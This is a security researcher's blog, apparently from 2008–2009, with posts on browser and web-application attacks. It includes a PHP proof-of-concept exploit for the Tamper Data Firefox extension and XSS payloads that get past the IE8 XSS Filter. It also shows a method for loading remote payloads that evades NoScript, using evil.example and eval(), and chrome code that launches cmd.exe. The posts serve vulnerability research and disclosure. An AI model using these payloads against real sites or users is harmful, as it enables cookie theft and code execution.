Thursday, July 16, 2009

It's been a while

So it's been a while since I've posted anything here, mostly because this blog was the product of a hell of a lot of free time (aka high school). Since then I've been going to uni full time and working part time, which hasn't left me with much spare time; on top of that, I figured out that if I put the same content into slides rather than blog posts, I can present it at conferences (selling out++) and have a fun time doing so.

In any case, I did some presentations recently and thought I should probably put details up here.

Last November I did a talk at Power of Community and XCon about the Same Origin Policy and some new ways of looking at it. Most of the new material was along the lines of the GIFAR attacks Billy Rios came up with, which Nate McFeters et al. ended up presenting at BlackHat, taking a lot of the wind out of my sails *shrug*. It should still be interesting, as it covers a lot of other things and points people in some uncommon directions. I've uploaded the paper I wrote and the slides here:

Slides
Paper

I also did a talk at RUXCON and 25c3 with Stefano Di Paola (and I even spelled his surname correctly this time! ^_^) called Attacking Rich Internet Applications, so here are some materials:

RUXCON Slides
25c3 Video Recordings

I never ended up releasing this while it worked, since I didn't want to kill a bug, but if you look at the video or were at the presentation you may have seen me demonstrate an exploit for Tamper Data. The bug is almost identical to this one, which I had claimed was exploitable. While my rationale in that post was incorrect (I had been testing with an old version of Tamper Data which was vulnerable in the way described), I came up with an interesting exploit for the bug in Firefox 3 which could have gained me code execution by editing about:config entries.

Here is the PoC exploit:

<?php
//This is just a PoC, have a look through about:config for any _string_ entry you would want to change
//This bug is kind of lame, but the exploit is cool, since it uses a Firefox bug to do damage (this should be unexploitable)
//Bug fires when a user graphs a malicious http request (open tamper data, graph the attack request)
header ("HTTP/1.1 200 OK<BR><B>Mime Type</B>: text/html\",event);' onMouseOut='hide_info();'><script>opener.oTamper.preferences.PREFERENCES_ROOT='';opener.oTamper.preferences.init();opener.oTamper.preferences.setString('app.update.url', 'jajaja');</script><g/='");
?>


The bug is triggerable on old Tamper Data versions where the Graph Requests functionality worked, and if you graphed the malicious request/response, the exploit would set app.update.url to jajaja.

The bug works by abusing a lack of access control on objects that extensions create in their windows (it wasn't just Tamper Data; it happened in other extensions too): it was possible to read and modify those objects and, more importantly, call their functions. When you called a function that an extension had created, it was executed in the context of the extension, namely as chrome code.

It did not end up being necessary or useful for this exploit, however it was also possible to call those functions while completely controlling their data via calls such as opener.oTamper.whatever_function.apply(our_obj).
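
To make the mechanism concrete, here's a mocked sketch of the access pattern (the object internals are invented for illustration; only the names mirror the PoC above, and the real impact depended on pre-fix Firefox 3 running the calls as chrome code):

```javascript
// Mocked sketch of the access-control bug: the real exploit reached into
// objects an extension had created on its window. Here `opener` is a plain
// object so the pattern is runnable standalone; the internals are invented.
const opener = {
  oTamper: {
    preferences: {
      PREFERENCES_ROOT: 'extensions.tamperdata.',
      init() { /* in the extension this re-read the preference branch */ },
      setString(key, value) {
        // Pre-fix, this executed with chrome privileges and wrote through
        // to about:config; here we just record the call.
        this.lastWrite = { key, value };
      },
    },
  },
};

// What the injected content script did: widen the pref root, then write.
opener.oTamper.preferences.PREFERENCES_ROOT = '';
opener.oTamper.preferences.init();
opener.oTamper.preferences.setString('app.update.url', 'jajaja');

// The .apply() variant mentioned above: same extension function, but with
// an attacker-chosen `this`, so even the object it operates on is ours.
const ourObj = {};
opener.oTamper.preferences.setString.apply(ourObj, ['app.update.url', 'jajaja']);
```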

In any case, the access control bug died somewhere in the last few Firefox 3.0.x releases, though I'm not sure exactly which, since the graphing functionality in Tamper Data has been broken for even longer and it got to be too much effort to double-check.

I also did a presentation at the OWASP Australia Conference in February titled "Examining and Bypassing the IE8 XSS Filter", which might be some nice background for people, but will probably be greatly surpassed by sirdarckcat & thornmaker's upcoming Black Hat presentation. Here are the Slides.

I also did a presentation on Writing Better XSS Payloads at EUSecWest in May; however, I haven't uploaded the slides, since I'm trying to submit the talk to Hack In The Box Malaysia to have the material reach a wider audience. So unless it's rejected, you'll have to wait until then to see it... Or email me.

And that's all for now...

Wednesday, September 24, 2008

Dynamic XSS Payloads in the face of NoScript

While participating in the CSAW CTF the weekend before last with s0ban, sirdarckcat and maluc (which we won btw, with 16375 points to second-placed RPISEC's 13575, go us ;), I had an interesting thought. One of our attacks was a persistent XSS attack that loaded its payload from off-site so that we could gain some level of persistent control. However, I realised that this attack would fail completely in the face of NoScript, even if our XSS succeeded, since the victim would not have our malicious domain whitelisted.

So, in light of that, I was thinking about how we could load our payload from off-site without needing JavaScript from the remote site to run. Of course, I am assuming you have already bypassed NoScript's XSS filters (e.g. because the attack was persistent), but this is particularly useful for persistent attacks where you may want to change the payload later.

After thinking about this for a while, I realised we already solved this problem a while ago, when we were talking about using TinyURL for data storage back in 2006: http://kuza55.blogspot.com/2006/12/using-tinyurl-for-storage-includes-poc.html.

Of course TinyURL itself would be of no use to us here, as we are interested in being able to change our payload. However, all it would take to make the technique useful is changing the URL to point to a domain you control (and possibly adding some kind of synchronisation, so that we execute in the order we want rather than the order we get data back from our evil web server).
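
One plausible rendering of the idea (this is my sketch, not the original PoC; the domain names and the choice of the URL fragment as the channel are assumptions): have the injected same-origin script frame an attacker URL, have the attacker's server 302 to a dead page back on the victim's whitelisted domain with the current payload in the fragment, then read the frame's location.hash and eval it. No script ever needs to execute from the attacker's origin:

```javascript
// Sketch with my assumptions marked: the helpers are pure so the idea is
// testable outside a browser; the comment block shows the browser wiring.
function encodePayloadUrl(victimOrigin, payload) {
  // What the attacker's redirector would send as its Location header:
  // a dead page on the *victim's* origin, payload smuggled in the fragment
  // (fragments are never sent to the server, so the 404 handler is moot).
  return victimOrigin + '/nonexistent.html#' + encodeURIComponent(payload);
}

function extractPayload(hash) {
  // What the injected script runs once the frame has landed same-origin.
  return decodeURIComponent(hash.replace(/^#/, ''));
}

// In the browser, roughly (hypothetical wiring):
//   var f = document.createElement('iframe');
//   f.src = 'http://evil.example/redirector';  // 302s back to the victim
//   f.onload = function () {
//     eval(extractPayload(f.contentWindow.location.hash));
//   };
//   document.body.appendChild(f);

const url = encodePayloadUrl('http://victim.example', 'alert(document.cookie)');
const hash = url.slice(url.indexOf('#'));
console.log(extractPayload(hash)); // the payload round-trips intact
```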

Nothing really ground-breaking, but something interesting nonetheless.

Thursday, September 04, 2008

IE8 XSS Filter

IE8 came out recently and a bunch of people have already commented about the limitations of the XSS Filter.

But there are a few more issues that need to be looked at. First of all, if anyone hasn't already done so, I recommend reading this post by David Ross on the architecture/implementation of the XSS Filter.

After talking to Cesar Cerrudo, it became clear that we had both come to the same conclusion: the easiest way to generically bypass the filter would be to attack the same-site check, and if we can somehow force the user to navigate from a page on the site we want to attack to our XSS, then we've bypassed the filter.

If the site is a forum or a blog, this becomes trivial, as we're allowed to post links. Even if we cannot normally post links it is still trivial, since we can inject links in our XSS, as the XSS Filter doesn't stop HTML injection; in any case, read this for more details.

However, this is not the only way to force a client-side navigation. One particular issue (normally not considered much of a vulnerability, unless it allows XSS) is when an application lets users control the contents of a frame; this is often seen in the help sections of web apps. Navigation caused by an iframe seems to be considered somehow user-initiated (or something), so the same-site check is applied, and if we point a frame on a site at an XSS exploit, the exploit will trigger.

Initially I had thought this would extend to JavaScript based redirects of the form:
document.location = "http://www.site.com/user_input";
or in the form of frame-breaking code; however, this does not seem to be the case. IE attempts to determine whether a redirect was user-initiated, and if it decides it was not, it does not apply the same-site check and simply runs the XSS Filter. Though, as with the popup blocker before it, it has some difficulty being correct 100% of the time; e.g. this counts as a user-initiated navigation:
<a name="x" id="x" href="http://localhost/xss.php?xss=<script>alert(7)</script>">test</a>
<script>
document.links[0].click();
</script>

However, this is probably a very unrealistic issue, as we need the vulnerable site to actually let the attacker create such a construct.

Furthermore, HTTP Location redirects and meta refreshes are also not considered user navigation, so filtering is always applied to them; therefore open redirects are pretty irrelevant to the XSS Filter.

However, Flash-based redirects do not seem to be considered redirects (which is unsurprising, given that IE has no visibility into Flash files), so any Flash-based redirect can be taken advantage of to bypass the XSS Filter. Though if it requires a user to click, it is probably easier to just inject a link (as described in Cesar's post).

And that's about all I could think of wrt that check :S

However, if you go read Cesar's post you'll see we now do have a method to generically bypass the IE8 XSS Filter, and it only requires an additional click from the user, anywhere on the page.

In a completely different direction: when I first read the posts saying the XSS Filter was going to prevent injections into quoted JavaScript strings, my first thought was "yeah, right, let's see them try", as I had assumed they would attempt to prevent an attacker breaking out of the string. Instead, the filter has signatures to stop the actual payload. Essentially, the filter attempts to stop you from calling a JavaScript function or assigning data to sensitive attributes, so all of the following injections are filtered:
"+eval(name)+"
");eval(name+"
";location=name;//
";a.b=c;//
";a[b]=c;//

among a variety of other sensitive attributes. However, this does still leave us some limited scope for attacks that may be possible in reasonably complicated JavaScript.

We are still left with the ability to:
- Reference sensitive variables, which is especially useful when injecting into redirects, e.g.
"+document.cookie+"
- Conduct variable assignments involving sensitive data, e.g.
";user_input=document.cookie;//
or
";user_input=sensitive_app_specific_var;//
- Make function assignments, e.g. (Note though that you can't seem to assign to some functions e.g. alert=eval doesn't seem to work)
";escape=eval;//

Also, like the meta-tag stripping attack described by the 80sec guys (awesome work btw, go 80sec!), we can strip other pieces of data which look like XSS attacks, such as frame-breaking code, redirects, etc. Note that we can't strip single lines of JS, since a JS block needs to be syntactically valid before it starts executing; but anything potentially active which acts as a security measure beyond the extent of its own tag can be stripped.
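
To make the stripping attack concrete (the URL and parameter name are hypothetical, and I haven't re-verified the exact neutering behaviour beyond the 80sec write-up): the attacker echoes the page's own defensive markup in a request parameter, so the filter "sees" a reflected attack and neuters the legitimate copy in the response:

```javascript
// Sketch: crafting a URL that tricks the IE8 XSS Filter into neutering a
// page's own frame-busting script. All names here are hypothetical; the
// string is split only so it can't terminate an enclosing script block.
const frameBuster =
  '<script>if (top != self) top.location = self.location;</scr' + 'ipt>';

// Echo the site's own defence back at it in a harmless parameter; the
// filter matches the "reflected" copy against the response body and
// disables the real frame-busting code, leaving the page frameable.
const attackUrl =
  'http://victim.example/page?comment=' + encodeURIComponent(frameBuster);

console.log(attackUrl);
```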

It's also worth noting that the XSS Filter doesn't strip all styles; it only strips those that would allow more styles to slip past it, and styles which can execute active code (which is pretty much just expression()).

And that's all from me at the moment. If anyone's looking for an interesting area for research, see if the IE8 XSS Filter always plays nice with server-side XSS filters; who knows, maybe by getting the filter to strip stuff and break the context, you can get your own HTML rendered in a context the server-side filter didn't expect.

P.S. Take this all with a grain of salt, this has been derived through black-box testing, and as such any of the conclusions above are really just educated guesses.

P.P.S Good on David Ross and Microsoft for making a positive move forward that's going to be opt-out. Obviously everyone is going to keep attacking it and finding weaknesses, but even if this only stops the scenario where the injection is right in the body of the page, then it's a huge step forward for webappsec; if this effectively blocks injections into JavaScript strings then ASP.NET apps just got a whole lot more secure.
Though I still think the HTML-injection issue needs to be fixed, because even if it's an additional step, users are going to click around and we're just going to see attackers start utilising HTML injection.

P.P.P.S. Don't forget this is based on security zones, so it can be disabled, and it is opt-in (off by default) for the intranet zone; so all those local zone XSSes for web servers on localhost, or XSSes in intranet apps, are going to be largely unaffected.

Wednesday, August 06, 2008

Thoughts on the DNS patch/bug

Is it just me, or does the DNS patch only seem to buy us more time?

At most this decreases the chance of a successful attack 65k times; at worst it doesn't help at all because of NAT, and if you're running a default MS <= Win2k3 OS then it's about 2.5k times.
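
Back-of-envelope for those multipliers (the port counts below are my rough assumptions, not measured values):

```javascript
// Rough arithmetic behind the figures above. Before the patch an attacker
// only had to match the 16-bit TXID; afterwards, the source port too.
const txids = 65536;          // 16-bit transaction ID space
const portsPatched = 64000;   // ~usable ephemeral ports after the patch (assumption)
const portsWin2k3 = 2500;     // ~default MS <= Win2k3 ephemeral range (assumption)

const perGuessBefore = 1 / txids;
const perGuessAfter = 1 / (txids * portsPatched);

console.log(perGuessBefore / perGuessAfter); // ~64000: the "65k times" figure
console.log(portsWin2k3);                    // the much weaker "2.5k times" case

// And behind a NAT that rewrites source ports to a predictable range, the
// port factor collapses back towards 1: the "at worst it doesn't help" case.
```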

Honestly, I haven't had time to play around with any of the exploits floating around, but given that 1 attempt = at most 2 packets (and it's probably much closer to 1, since you can try lots of responses per packet), we can send 32k packets pretty quickly, and the figures here also seem to say it works pretty damn quickly.

I'm not going to run any figures, but given how network speeds seem to go constantly upwards (or do we want to speculate about an upper cap?), at some stage sending 65k times the amount of data is going to be bloody fast again, and this will become an issue all over again.

And if that ever happens, what's left to randomize in the query? Nothing, as far as I can tell. So is the hope that by then we'll all have switched to DNSSEC, or are we planning on altering the DNS protocol at that point?

Anyway, going in a completely different direction, I want to take issue with the idea, pervading a lot of descriptions of the DNS bug, that poisoning random subdomains isn't an issue.

For your typical attack, yes, poisoning random subdomains is kind of useless. However, a lot of the web is held together by the idea that absolutely everything in a domain's DNS tree is controlled by that domain and is to some extent trustworthy (think cookies and document.domain in JavaScript).
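
As a concrete illustration (all domain names invented): a page on any poisoned subdomain can plant a cookie scoped to the entire registrable domain, which the real parent site will happily send back and trust:

```javascript
// Sketch of why owning random.sub.example.com matters: the Set-Cookie
// header it can emit is valid for every host under example.com.
function domainWideCookie(name, value, registrableDomain) {
  return name + '=' + value + '; Domain=.' + registrableDomain + '; Path=/';
}

console.log(domainWideCookie('session', 'attacker-chosen', 'example.com'));
// session=attacker-chosen; Domain=.example.com; Path=/

// Similarly, script on the poisoned host could set
//   document.domain = 'example.com';
// and then interact directly with frames from the legitimate site.
```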

Also, it seems odd that, given that the ability to poison random subdomains seems to be common knowledge to some people, Dan is nominated for another Pwnie award for XSS-ing arbitrary nonexistent subdomains. Sure, that bug gives you the ability to phish people more easily, but to me the biggest part seemed to be that you could easily attack the parent domains from there.

Anyway, the patch, while it has its limitations, seems to buy us some time with both these bugs, and in fact should buy us time with any bug where responses are forged, so that's always a good thing.

Sunday, August 03, 2008

Is framework-level SQL query caching dangerous?

I was in a bookshop a few months ago and picked up a book about Ruby on Rails. Though I sadly didn't buy it (having already bought more books than I wanted to carry) and I've forgotten its name, there was an interesting gem in there that stuck in my head.

Since 2.0, Ruby on Rails' main method of performing SQL queries (ActiveRecord) caches the results of SELECT queries by default (though it does string-level matching of queries, so they need to be completely identical rather than just functionally identical) until a relevant UPDATE query touches the table.

I haven't had a chance to delve into the source to see how granularly the cache is updated (i.e. if a row in the cache was not touched by an UPDATE, is the cache still invalidated since the table was updated?), but in any case, it still seems dangerous.

Caching data that close to the application means that unless you know about the caching and either disable it or ensure that anything else that possibly updates the data also uses the same cache, you may end up with an inconsistent cache.

Assuming that flushing the cache is a fairly granular operation (or there is very little activity on the table, or users are stored in separate tables, or something similar), it seems feasible that if there is any other technology interacting with the same database, it would be possible to ensure that dodgy data is cached in the Rails app.

A possible example would be a banking site where an SQL query like
SELECT * FROM accounts WHERE acct_id = ?
is executed when you view your account details or attempt to transfer money. If there were another interface for withdrawing money (let's say an ATM; it doesn't even have to be web-based) that bypassed Rails' SQL cache, it is theoretically possible that we would be able to withdraw the money while the Rails app still thinks we have money left.

At this point of course things would become very implementation specific, though there are two main ways I could see this going (maybe there are more):

1. We could be lucky and the application itself subtracts the amount we're trying to transfer and then puts that value directly into an SQL query, so it's as if we never withdrew any money.

2. We could be unlucky and an SQL query of this variety is used:
UPDATE accounts SET balance = balance - ? WHERE acct_id = ?
In which case the only thing we gain is the ability to overdraw an account where we usually could not; not particularly useful unless you've already stolen someone else's account and want to get the most out of it, but it does still allow us to bypass a security check.
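
The failure mode is easy to simulate with a toy string-keyed cache; this is purely an illustration of the inconsistency I'm describing, not Rails code:

```javascript
// Toy model: an app-level SELECT cache keyed on the literal SQL string,
// invalidated only by writes that go through the same layer.
class CachedDb {
  constructor(db) { this.db = db; this.cache = new Map(); }
  select(sql) {
    if (!this.cache.has(sql)) this.cache.set(sql, this.db.query(sql));
    return this.cache.get(sql);
  }
  update(sql) { this.db.query(sql); this.cache.clear(); } // app-path writes invalidate
}

// Single-row "bank" backing store; query() is a stand-in for real SQL.
const backend = {
  balance: 100,
  query(sql) {
    if (sql.startsWith('SELECT')) return this.balance;
    if (sql.startsWith('UPDATE')) this.balance -= 100; // a withdrawal
  },
};

const app = new CachedDb(backend);
app.select('SELECT balance FROM accounts WHERE acct_id = 1'); // caches 100

// The "ATM" writes straight to the backend, bypassing the app's cache...
backend.query('UPDATE accounts SET balance = balance - 100 WHERE acct_id = 1');

// ...so the app still believes the money is there.
console.log(backend.balance);                                              // 0
console.log(app.select('SELECT balance FROM accounts WHERE acct_id = 1')); // 100
```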

Does anyone have any thoughts on this? Is this too unlikely? Is no-one ever going to use Rails for anything sensitive? Should I go and read the source next time before posting crap? Or does anyone have knowledge of the Rails caching mechanism? I'll probably take a look soon, but given I've been meaning to do this for months...

Sunday, July 27, 2008

XSS-ing Firefox Extensions

[EDIT]:It turns out I fail at testing things on the latest version, see comments for some more details, sorry about that Roee.[/EDIT]

Roee Hay recently posted a blog post on the Watchfire blog about an XSS bug in the Tamper Data extension (it was posted much earlier, but removed quickly; RSS is fun), however when he assessed the impact he was wrong.

The context of the window is still within the extension, and so by executing the following code you can launch an executable:

var file = Components.classes["@mozilla.org/file/local;1"]
                     .createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("C:\\WINDOWS\\system32\\cmd.exe");
file.launch();

(Code stolen from http://developer.mozilla.org/en/docs/Code_snippets:Running_applications)

But even then: I had never even heard of the graphing functionality in Tamper Data, and given the need to actually use that functionality on a dodgy page, the chance of anyone getting owned by this seems very small to me.

Monday, July 21, 2008

Licensing Content

Now, I am not a lawyer (so I don't know what information can be licensed and what can't), but as far as I know, the fact that I have specified no license for the use of content on this blog does not mean it is in the public domain or anything similar.

So, I just wanted to make a quick post about what license the content of this blog is provided under.

All the information on this blog is DUAL LICENSED,
1. If you plan to use it for personal or non-profit purposes you can use it under the Creative Commons "Attribution-Noncommercial-Share Alike 3.0" license.

2. In case you plan to use it for _any_ other purpose, e.g.:
   a. use the information in any commercial context
   b. implement this information in your non-GPL application
   c. use this information during a Penetration Test
   d. make any profit from it
   
   you need to contact me in order to obtain a commercial license.

Seems only fair to me :)

P.S. Since realistically the chance of me finding a violation is slim-to-none, and the chance of me actually doing anything about it (e.g. going to court, etc), is even smaller, this is more a statement of my will for the information than anything else.